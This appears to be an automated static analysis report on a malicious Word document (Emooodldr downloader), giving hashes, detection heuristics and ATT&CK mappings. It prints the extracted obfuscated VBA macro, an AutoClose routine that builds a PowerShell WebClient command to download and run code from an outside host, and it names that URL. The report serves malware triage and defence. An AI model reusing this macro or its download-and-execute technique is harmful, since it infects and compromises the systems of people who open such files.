Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 2ec2cf27a1b5e1af…

MALICIOUS

Office (OOXML)

Size: 60.5 KB
Created: 2017-11-29 23:43:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2019-08-04
MD5: 789336e5f87687eda0f9b1a57a8c10f3
SHA-1: 4b448b69ff6d34397beacc4e18dd79c40d5004f2
SHA-256: 2ec2cf27a1b5e1af7b771fff66d00ccfb8a5584c8f2867519f7fb8c9dbb7dbe4
Risk score: 264

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. Static analysis revealed VBA macros, specifically an AutoClose macro that calls CreateObject to execute a downloaded payload. The script attempts to download a file from 'http://yyqakuvunggjqidojzxqkuixnvwjuzv.com/REX/unlock.doc.doc?uid=nordc' and execute it, indicating a downloader functionality.

Heuristics (7)

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 (severity: critical, rule CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML (severity: medium, rule OOXML_VBA; 3 related findings)
    Document contains a VBA project — VBA macros present
  • Auto_Close macro (severity: high, rule OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • CreateObject call (severity: high, rule OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high, rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact (severity: info, rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info, rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the following URLs were found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5578 bytes
SHA-256: 446f4dbdd2e69c406e64c53dd8932f77927f8f4efc8f5c136c388b4ffd1791c4
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
  dgyovqqfjxx = Val("3125")
ivvzrgnvgwf = "juqcfgvwngy" + "" + "" + "byzcffr"
  Application.Run "cqdgynwycndyvwc"
  qkwwxonb = "fkvckxbuoqyxwjicyuwocggvco" + ""
xcywgvfz = "kckgwy" + "dqddbw" + "qwzkig" + "krwjzky"
End Sub

Sub cqdgynwycndyvwc()
 nfrqfizfqxf = "xjq" + "" + "qnddcvbcd"
dvfnnoq = Val("4449")
 kfycfwnvvkcoc = "vfnfgqyvfzojowgnxnkxdjxzcyrunggjqidojzxhgnxnkxdjxzcyll.gnxnkxdjxzcyxgnxnkxdjxzcy -Exgnxnkxdjxzcyc Byvfnfgqyvfzojqkuixnvwjuzvunggjqidojzxunggjqidojzx -NoP -NoExigcrkvgzwyqxb -Coiuruongojfgqiuruongojfgqqkuixnvwjuzvnd  ignxnkxdjxzcyx((Ngnxnkxdjxzcyw-Objgnxnkxdjxzcycgcrkvgzwyqxb Syunggjqidojzxgcrkvgzwyqxbgnxnkxdjxzcyiuruongojfgq.Ngnxnkxdjxzcygcrkvgzwyqxb.WgnxnkxdjxzcybClignxnkxdjxzcyngcrkvgzwyqxb).DownloqkuixnvwjuzvdSgcrkvgzwyqxbring('hgcrkvgzwyqxbgcrkvgzwyqxbvfnfgqyvfzoj://yyqkuixnvwjuzvunggjqidojzxdhwdqkuixnvwjuzvhwdqkuixnvwjuzvunggjqidojzxdunggjqidojzxqkuixnvwjuzv.coiuruongojfgq/REX/unggjqidojzxlick.vfnfgqyvfzojhvfnfgqyvfzoj?ugcrkvgzwyqxbiuruongojfgqqkuixnvwjuzv=nordc'))"
kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "iuruongojfgq", "m")
yibnfjkxrknx = "bjjfzfduzjyzvfddonwwcqkzqkxj" + "zwywknwuxzviwzcdkvuff"
obxwizgo = Val("3604")
woujywvb = -183
kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "qkuixnvwjuzv", "a")
qqndovo = "oqbckbbxikzxogbjykvzxkfzd" + "djiq" + "" + "wbwi"
kwijgxoqf = -225
jjgrycfwz = 4548
ivrwyfgrbzd = 2730
cnuijxcwnkkn = "" + "bqjgq" + "qbwdbnuydfczwfoc"
quocbxjjqign = 3385
kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "unggjqidojzx", "s")
kogkigzod = "uroudzqqqznr" + "zuxgcgzqfucrxrrydkkkr" + "kooidxcdxwibfdkng"
iobbyrnfxc = 1365
uqwxgrfj = "izcrvrqvnzvqdndgbxqi" + "" + "" + "oqnykkbqc"
yknyynqk = Val("-731")
kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "gcrkvgzwyqxb", "t")
rvvyowuvccnq = Val("-687")
duxbcrbdr = 4357
kiryxcfkvzg = "wczkbcfd" + "xbfcwd" + "gyvkfg" + "vnzdgyzkjcnnyn"
kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "gnxnkxdjxzcy", "e")
ijujfvbjnbxc = 1323
zzujvjoyucg = "qncuxwziogicqi" + "fvbfjvkfzcikrkd" + ""
guxdjguxkri = Val("-188")
bzzjugdnvdo = -617
djnvkznoynq = Val("3060")
doxygjkwd = "dogjnwgxdcbdnwungzwoxconfbjd" + "" + "" + "xcijxonxjkwyunj"
kfycfwnvvkcoc = ivxjjfrnzrjnwknqc(kfycfwnvvkcoc, "vfnfgqyvfzoj", "p")
vvrfxqfzo = "gvxwqdrgoovykvfn" + "yfviybrnqrwx" + "" + "" + ""
uxirfrvdodq = "cr" + "xugyqv"
dfukfkggkk = "" + "" + "" + ""
cvyvivbn = -541
yiqnkrdfccz = "qbiwyq" + "qvjdcv" + "cokbwnn" + "knovcufz" + "rkorow"
yqkuvqg = Val("1781")
rkxboycxnznrxc = "WScriubkqzvqzjwvcbfgidciyduvx.Shrdyggjwyqovvll"
rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "dnvrucgjnqrk", "m")
yibnfjkxrknx = "bjjfzfduzjyzvfddonwwcqkzqkxj" + "zwywknwuxzviwzcdkvuff"
rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "cyqrifqrbbfz", "a")
qqndovo = "oqbckbbxikzxogbjykvzxkfzd" + "djiq" + "" + "wbwi"
kwijgxoqf = -225
uwozcqu = "bj" + "xwnjdcjfdy" + "jyxwcqy" + "kozuriycofkxjo" + "kdxvgbbnbxkqfvg" + "grdurwj"
ndbcrkxkuxdr = 4980
rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "cfgqudvzdqqu", "s")
kogkigzod = "uroudzqqqznr" + "zuxgcgzqfucrxrrydkkkr" + "kooidxcdxwibfdkng"
iobbyrnfxc = 1365
uqwxgrfj = "izcrvrqvnzvqdndgbxqi" + "" + "" + "oqnykkbqc"
rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "bfgidciyduvx", "t")
rvvyowuvccnq = Val("-687")
duxbcrbdr = 4357
rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "rdyggjwyqovv", "e")
ijujfvbjnbxc = 1323
zzujvjoyucg = "qncuxwziogicqi" + "fvbfjvkfzcikrkd" + ""
guxdjguxkri = Val("-188")
zwqrqrunr = 672
nzkyddoqzn = "boinywgzwkk" + "iniobn"
rkxboycxnznrxc = ivxjjfrnzrjnwknqc(rkxboycxnznrxc, "ubkqzvqzjwvc", "p")
vvrfxqfzo = "gvxwqdrgoovykvfn" + "yfviybrnqrwx" + "" + "" + ""
uxirfrvdodq = "cr" + "xugyqv"
dfukfkggkk = "" + "" + "" + ""
qbkrxnkfxnyq = "dyxjnzdqfzznnwgr
... (truncated)
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 21504 bytes
SHA-256: cf3740a8fe9a7fe6d132c39348f116521db8f4e49173fee115acea3c6acd8a2d
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).